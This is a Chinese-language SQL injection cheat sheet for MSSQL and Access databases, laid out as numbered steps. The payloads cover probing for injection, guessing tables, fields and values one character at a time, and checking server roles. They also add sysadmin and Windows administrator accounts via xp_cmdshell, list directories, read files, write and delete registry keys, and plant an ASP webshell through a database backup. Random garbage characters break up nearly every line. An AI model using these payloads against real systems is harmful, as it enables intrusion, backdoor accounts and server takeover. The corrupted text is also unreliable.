1.判断是否有注入;and 1=1 ;and 1=2 0�}j�B/Z_T
2.初步判断是否是mssql ;and user>0 �?cf9q@eAH
1QXv}36#3n
3.注入参数是字符'and [查询条件] and ''=' <e|I?zI9�-
{C�nz7TV�B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' -sl]
funRy
�7u-o7#,X2
5.判断数据库系统 SU�xz &xH�
+/*�,%TdQ4
;and (select count(*) from sysobjects)>0 mssql \�'6hv>W@
rW�E�JC�Fa
;and (select count(*) from msysobjects)>0 access ~=i9]%g�?
~7T]l1]�W%
�1i��:�l�
Js[dT��|>.
6.猜数据库 ;and (select Count(*) from [数据库名])>0 LDHu��f<`�
�B'B,,M�z�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 FS30RP3
`/
<z��H�24[�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �f�Qq'_q5
?"[b408�-
9.(1)猜字段的ascii值(access) P#bZtWx'<N
Jw?J�(i�g^
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �85�YE6^y
U���Oy9N�
(2)猜字段的ascii值(mssql) '+^H�eM^�;
<����7c�m[
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !lp�*0h�(7
Y�##�ft��Q
10.测试权限结构(mssql) Oe=7��z'o�
|]sh*<:?�,
GZQy~U�k�~
w N9I �)hB
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �BXy�g� ?�
_U;z��@���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >p Y�0�f }
9�m MPkg�c
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^2}0��lP|
H-�>J.5~,K
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- D�Y�kNP:�+
���`Xv�r�f
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��[f,; +Ze
�ZW
�n �j-
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 8.bIP
ju%v
W>��+\�A"�
;and 1=(select IS_MEMBER('db_owner'));-- ���>.N?y@�
X�h�jH68S(
c�Ln�&b}8'
��IY2ca�Xu
11.添加mssql和系统的帐户 �
�+T02AS�
^=@L�(;�Y
;exec master.dbo.sp_addlogin username;-- 0@��[]l{N
;exec master.dbo.sp_password null,username,password;-- �&u0��Jz�K
@�D�G��$��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6P�c3�;X~�
\zCT�""�'i
;exec master.dbo.xp_cmdshell 'net user username password =n|n�%N4�Y
/�9�<zG}:B
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �C5GO?X2��
Ge=+�0W)�&
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �(<�!Yw|~�
,,�vl+Z�<&
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- YNV4w{>�FD
q�V2aa9p+�
B*��#lkMr
T7_i:�HU%
12.(1)遍历目录 ���oZT�KG'
v �{��E~R�
;create table dirs(paths varchar(100), id int) uQgv ;jsPz
Y8Y�N�Ryc=
;insert dirs exec master.dbo.xp_dirtree 'c:\' �[A99�e��`
JJ�_7�7��i
;and (select top 1 paths from dirs)>0 �,�;9�b�yb
z/yN�F�Y]i
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) %7WGodlXW�
*^�+8_%;�1
�mb_*FJB-_
$��|-�j�oY
(2)遍历目录 }cuU5WQ�?%
�`) s�]T.-
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ]G�m"U!h�*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �L�Rl2@&z<
ik�d�~�k>F
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 O�o<L�~�7B
7�kJ ��=C
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �luAm���q+
H�C4qP9�Gs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 x`/"1]�Nf
:s|"� �ZR�
t_cNH@^3<3
!*#2~�$:��
13.mssql中的存储过程 �R]hilb'a
G`3/$�{t�i
xp_regenumvalues 注册表根键, 子键 A��B92�R�/
b`M�� 2VZu
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $A"��C1)d;
t/�xW�J�W2
xp_regread 根键,子键,键值名 w+��c�%Y\:
� �vU��(2[
;exec xp_regread <pzC�p�F<�
/~RY{ c@#L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 HX\^ecZ#�E
��iOk^RDG+
xp_regwrite 根键,子键, 值名, 值类型, 值 %�DH2]B? 0
zn��m3b8ns
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 v%��8.�o%G
Bg�.~#H���
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 B�V�AxeXO�
(/6~*<ZGT
xp_regdeletevalue 根键,子键,值名 k�$j4~C'$�
�Kx�s_�R#k
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >6�x�Z�F'4
>drG,v0qh�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �}�',/~T6�
"��`�;$w�A
���vV�5dW
��$mf���Z{
14.mssql的backup创建webshell `a���*_b�9
7��OSk0%Q,
use model �Q7uhz�5oZ
�;�A^Ii>`
create table cmd(str image); ��t2V|moG
$J]VY;C!��
insert into cmd(str) values (''); ,r�u2C_LQ�
��PX7�@3Y
backup database model to disk='c:\l.asp'; T�\Zf`.m�t
|^:� A,%>�
l\+^��.ezD
R'M�=`�33M
15.mssql内置函数 �Y|�%s =0M
F\L�Aw#IJ
;and (select @@version)>0 获得Windows的版本号 =QG@{?JTl�
)?es3Ehqq
;and user_name()='dbo' 判断当前系统的连接用户是不是sa jh�U'UAn�
Vqr#�%.��N
;and (select user_name())>0 爆当前系统的连接用户 `x����b\�)
r57����CyO
;and (select db_name())>0 得到当前连接的数据库 ,��|�:TM�L
`v;9!ReZ�V
,�ddo�I��I
,�mk�XU��W
16.简洁的webshell �|%��p;�4b
��v D"4aw
use model LBO3�){�=J
cOz8Y�VR-�
create table cmd(str image); yDmNPk�/��
`XT8}�9�z!
insert into cmd(str) values (''); Fog4m�=b`g
Y�8$�Y]�2�
backup database model to disk='g:\wwwtest\l.asp';
